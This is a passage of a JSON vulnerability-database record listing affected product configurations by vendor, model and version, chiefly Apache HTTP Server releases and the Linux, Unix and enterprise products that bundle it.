            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "-dev",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.56"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.6"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.5"
          },
          {
            "_id": null,
            "model": "network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4)4.2"
          },
          {
            "_id": null,
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "interstage application server standard-j edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.34"
          },
          {
            "_id": null,
            "model": "interstage studio standard-j edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.28"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10.1x86"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "11"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.39"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.10"
          },
          {
            "_id": null,
            "model": "workstation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "6.5.2"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.5"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "-dev",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.7"
          },
          {
            "_id": null,
            "model": "ccs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.2"
          },
          {
            "_id": null,
            "model": "personal",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "networks self-service peri application",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux enterprise sdk 10.sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "suse",
            "version": null
          },
          {
            "_id": null,
            "model": "appliance server hosting edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.51"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          },
          {
            "_id": null,
            "model": "networks self-service wvads",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "interstage studio enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "ccs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.1"
          },
          {
            "_id": null,
            "model": "-dev",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.35"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.1"
          },
          {
            "_id": null,
            "model": "advanced workstation for the itanium processor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.4"
          },
          {
            "_id": null,
            "model": "ccs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "interstage application server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "8.0.2"
          },
          {
            "_id": null,
            "model": "player",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.6"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.35"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.22"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "novell linux desktop sdk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.9"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "interstage application server plus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "red hat network satellite server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "_id": null,
            "model": "2.2.6-dev",
            "scope": null,
            "trust": 0.3,
            "vendor": "apache",
            "version": null
          },
          {
            "_id": null,
            "model": "1.3.40-dev",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apache",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux ws ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.53"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.9"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.3"
          },
          {
            "_id": null,
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "interstage application server plus developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "messaging storage server mm3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.43"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.0"
          },
          {
            "_id": null,
            "model": "interstage apworks modelers-j edition 6.0a",
            "scope": null,
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "_id": null,
            "model": "interstage application server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.47"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.10"
          },
          {
            "_id": null,
            "model": "openview network node manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.51"
          },
          {
            "_id": null,
            "model": "interstage application server standard-j edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "8.0.2"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.55"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.10"
          },
          {
            "_id": null,
            "model": "solaris 8 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.20"
          },
          {
            "_id": null,
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "appliance server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.26"
          },
          {
            "_id": null,
            "model": "interstage business application server enterprise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "8.0.0"
          },
          {
            "_id": null,
            "model": "player",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.2"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.25"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.37"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.1"
          },
          {
            "_id": null,
            "model": "openview network node manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.53"
          },
          {
            "_id": null,
            "model": "interstage application server standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "interstage application server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.14"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.10"
          },
          {
            "_id": null,
            "model": "linux ppc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r1.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "voice portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux -current",
            "scope": null,
            "trust": 0.3,
            "vendor": "slackware",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.7"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.33"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.11"
          },
          {
            "_id": null,
            "model": "network proxy (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4)4.2"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.4"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.1"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.3.5.0"
          },
          {
            "_id": null,
            "model": "linux enterprise server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "networks self-service speech server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.2"
          },
          {
            "_id": null,
            "model": "fuji",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.17"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.2"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.3"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.36"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r1.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "interstage apworks modelers-j edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "application stack for enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "v14"
          },
          {
            "_id": null,
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3)4.2"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "appliance server workgroup edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "openview network node manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.01"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "advanced workstation for the itanium processor ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "meeting exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "solaris 8 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.10"
          },
          {
            "_id": null,
            "model": "solaris 10 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.48"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.45"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.12"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.1"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.47.1"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.38"
          },
          {
            "_id": null,
            "model": "interstage application server plus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "appliance platform linux service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.47"
          },
          {
            "_id": null,
            "model": "interstage application server web-j edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "2.0.61-dev",
            "scope": null,
            "trust": 0.3,
            "vendor": "apache",
            "version": null
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.46"
          },
          {
            "_id": null,
            "model": "2.0.62-dev",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apache",
            "version": null
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.2"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.5"
          },
          {
            "_id": null,
            "model": "networks self-service peri workstation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "interstage application server plus developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "ace",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.2"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.44"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.24"
          },
          {
            "_id": null,
            "model": "enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.63"
          },
          {
            "_id": null,
            "model": "enterprise linux as ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.40"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.4"
          },
          {
            "_id": null,
            "model": "application stack for enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "v14"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.6"
          },
          {
            "_id": null,
            "model": "voice portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.23"
          },
          {
            "_id": null,
            "model": "network proxy (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4)5.0"
          },
          {
            "_id": null,
            "model": "novell linux pos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9"
          },
          {
            "_id": null,
            "model": "business availability center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "8.01"
          },
          {
            "_id": null,
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1-1"
          },
          {
            "_id": null,
            "model": "message networking mn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.39"
          },
          {
            "_id": null,
            "model": "open-enterprise-server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "9"
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "fedora",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "7"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.11",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.4"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.19"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.3"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.18"
          },
          {
            "_id": null,
            "model": "ace",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.1"
          },
          {
            "_id": null,
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "ccs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.27"
          },
          {
            "_id": null,
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "interstage application server enterprise edition a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.31",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.9"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "network proxy (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3)4.2"
          },
          {
            "_id": null,
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "networks self-service web centric ccxml",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "networks self service voicexml",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.58"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.54"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop workstation client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.42"
          },
          {
            "_id": null,
            "model": "interstage application server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "interstage application server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "8.0.1"
          },
          {
            "_id": null,
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.1-1"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.3"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
